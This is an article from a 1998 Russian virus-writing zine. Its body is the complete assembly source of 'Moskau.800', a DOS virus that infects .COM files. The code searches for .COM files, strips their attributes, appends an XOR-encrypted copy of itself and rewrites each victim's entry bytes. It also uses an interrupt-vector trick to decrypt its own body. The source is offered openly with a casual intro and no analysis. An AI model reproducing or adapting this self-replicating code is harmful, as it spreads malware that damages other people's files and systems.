[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 5, May 1998 file 004
Вирус Moskau.800 (Moskau.98)
by RedArc
Сей зверек был накидан на листочек во время поездки в Москву... Сами
понимаете, три часа сидеть в эллектричке и ничего не делать... Короче смотрите
сами. Комментарии опять канули в лету ;)
=== Cut ===
Model Tiny
jumps
.code
.286
org 100h
START:
add bx,si
xchg bh,bl
sub si,cx
add bx,cx
xchg bx,si
dec bx
xchg ax,bx
add ax,cx
xchg ah,al
mov bh,al
xchg ah,bl
mov cx,bx
mov bx,ax
pusha
push es
push offset Entry
retf
Entry:
mov bp,cs:[100h+27]
mov [bp+OLD_SS],ss
mov [bp+OLD_SP],sp
mov ax,cs
mov ss,ax
mov ax,bp
add ax,TABLE_LEN
mov sp,ax
mov ax,bp
add ax,OFF17
push ax
mov ax,bp
add ax,OFF16
push ax
mov ax,bp
add ax,OFF15
push ax
mov ax,bp
add ax,OFF14
push ax
mov ax,bp
add ax,OFF13
push ax
mov ax,bp
add ax,OFF12
push ax
mov ax,bp
add ax,OFF11
push ax
mov ax,bp
add ax,OFF10
push ax
mov ax,bp
add ax,OFF9
push ax
mov ax,bp
add ax,OFF8
push ax
mov ax,bp
add ax,OFF7
push ax
mov ax,bp
add ax,OFF6
push ax
mov ax,bp
add ax,OFF5
push ax
mov ax,bp
add ax,OFF4
push ax
mov ax,bp
add ax,OFF3
push ax
mov ax,bp
add ax,OFF2
push ax
mov ax,bp
add ax,OFF1
push ax
mov ax,bp
add ax,OFF0
push ax
xor ax,ax
mov es,ax
mov si,bp
add si,Crypto
mov di,(0ffh*4+4)-CL_
cli
mov es:[1h*4],di
mov es:[1h*4+2],ax
sti
mov cx,CL_
rep movsb
mov ax,cs
mov es,ax
cmp byte ptr ds:[bp+EP2_],'A'
je EP1_
mov si,bp
add si,_SC
mov ax,cs
int 1h
EP1_:
mov byte ptr ds:[bp+EP2_],'V'
mov ax,bp
add ax,OFF0
jmp ax
EP2_ equ $-Entry
db 'A'
OLD_SS equ $-Entry
dw ?
OLD_SP equ $-Entry
dw ?
db 60 dup (0ffh)
TABLE_LEN equ $-Entry
Crypto equ $-Entry
C0_:
mov es,ax
cli
mov cs:[3h*4],bx
mov cs:[3h*4+2],si
sti
mov cx,EndCrypto / 2
C1_:
mov ax,es:[si]
xor ax,cx
xor ax,1234h
xor ax,cx
mov es:[si],ax
add si,2
loop C1_
cli
mov bx,cs:[3h*4]
mov si,cs:[3h*4+2]
sti
iret
CL_ equ $-C0_
WRITE_FILE_VIR:
OFF10 equ $-Entry
mov si,bp
add si,_SC
mov ax,cs
int 1h
mov ah,40h
mov cx,MyLen
mov dx,bp
int 21h
mov si,bp
add si,_SC
mov ax,cs
int 1h
mov di,sp
mov si,[di+22]
jmp si
StartCrypto:
_SC equ $-Entry
db '<MOSKAU98>'
db 'Stas'
SET_DTA_VIR:
OFF1 equ $-Entry
mov ah,1ah
mov dx,bp
add dx,MyLen
int 21h
mov di,sp
mov si,[di+4]
jmp si
TEST_FIND:
OFF3 equ $-Entry
jb TF1
mov di,sp
mov si,[di+8]
jmp si
TF1:
mov ah,1ah
mov dx,80h
int 21h
mov ax,[bp+OLD_SS]
mov ss,ax
mov ax,[bp+OLD_SP]
mov sp,ax
popa
inc ah
push ax
dec ah
ret
FIND_FIRST:
OFF2 equ $-Entry
mov ah,4eh
mov dx,bp
add dx,FMASK
mov cl,0ffh
int 21h
mov di,sp
mov si,[di+6]
jmp si
FIND_NEXT:
OFF17 equ $-Entry
mov ah,4fh
int 21h
mov di,sp
mov si,[di+6]
jmp si
CLEAR_ATTRIB:
OFF4 equ $-Entry
mov ax,4701h
mov dx,bp
add dx,MyLen+1eh
xor cx,cx
int 21h
mov di,sp
mov si,[di+10]
jmp si
OPEN_READ_FILE:
OFF5 equ $-Entry
mov ax,3d02h
mov dx,bp
add dx,MyLen+1eh
int 21h
xchg ax,bx
mov di,sp
mov si,[di+12]
jmp si
SET_DATA:
OFF14 equ $-Entry
mov ax,5701h
mov cx,[bp+MyLen+16h]
mov dx,[bp+MyLen+18h]
int 21h
mov di,sp
mov si,[di+30]
jmp si
SET_ATTRIB:
OFF16 equ $-Entry
mov dx,bp
add dx,MyLen+1eh
xor cx,cx
mov cl,byte ptr cs:[bp+MyLen+15h]
mov ax,4301h
int 21h
mov di,sp
mov si,[di+34]
jmp si
CLOSE_FILE:
OFF15 equ $-Entry
mov ah,3eh
int 21h
mov di,sp
mov si,[di+32]
jmp si
READ_BEGIN:
OFF6 equ $-Entry
mov ah,3fh
mov dx,bp
add dx,OLD_BYTE
mov cx,30
int 21h
mov di,sp
mov si,[di+14]
jmp si
FILE_YES:
OFF8 equ $-Entry
jc FY1
mov di,sp
mov si,[di+30]
jmp si
FY1:
mov di,sp
mov si,[di+18]
jmp si
TEST_FILE:
OFF7 equ $-Entry
mov di,bp
mov ax,[di+OLD_BYTE]
cmp ax,4d5ah
jne _TF1
_TF0:
clc
_TFE:
mov di,sp
mov si,[di+16]
jmp si
_TF1:
cmp ax,5a4dh
jne _TF2
jmp short _TF0
_TF2:
cmp ax,0DE03h
jne _TF3
jmp _TF0
_TF3:
nop
mov ax,[bp+MyLen+1ch]
cmp ax,0
je _TF4
jmp _TF0
_TF4:
nop
mov ax,[bp+MyLen+1ah]
and ax,0f000h
cmp ax,0f000h
jnz _TF5
jmp _TF0
_TF5:
nop
stc
mov di,sp
mov si,[di+16]
jmp si
REMOVE_END:
OFF9 equ $-Entry
mov ax,4202h
xor cx,cx
xor dx,dx
int 21h
mov di,sp
mov si,[di+20]
jmp si
REMOVE_START:
OFF11 equ $-Entry
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h
mov di,sp
mov si,[di+24]
jmp si
WRITE_FILE_BEG:
OFF13 equ $-Entry
mov ah,40h
mov cx,30
mov dx,bp
add dx,NEW_BYTE
int 21h
mov di,sp
mov si,[di+28]
jmp si
CALCULATE_BEG:
OFF12 equ $-Entry
mov ax,[bp+MyLen+1ah]
inc ah
mov [bp+NB1+1],ax
mov di,sp
mov si,[di+26]
jmp si
RESTORE_BYTE:
OFF0 equ $-Entry
mov si,bp
xor ax,ax
add si,OLD_BYTE
inc ah
mov di,ax
mov cx,30
rep movsb
mov di,sp
mov si,[di+2]
jmp si
NEW_BYTE equ $-Entry
add bx,si
xchg bh,bl
sub si,cx
add bx,cx
xchg bx,si
dec bx
xchg ax,bx
add ax,cx
xchg ah,al
mov bh,al
xchg ah,bl
mov cx,bx
mov bx,ax
pusha
push es
NB1 equ $-Entry
push offset Entry
retf
OLD_BYTE equ $-Entry
db 0cdh
db 020h
db 28 dup (90h)
FMASK equ $-Entry
db '*.com',0h
EndCrypto equ $-StartCrypto
MyLen equ $-Entry
END START
=== Cut ===
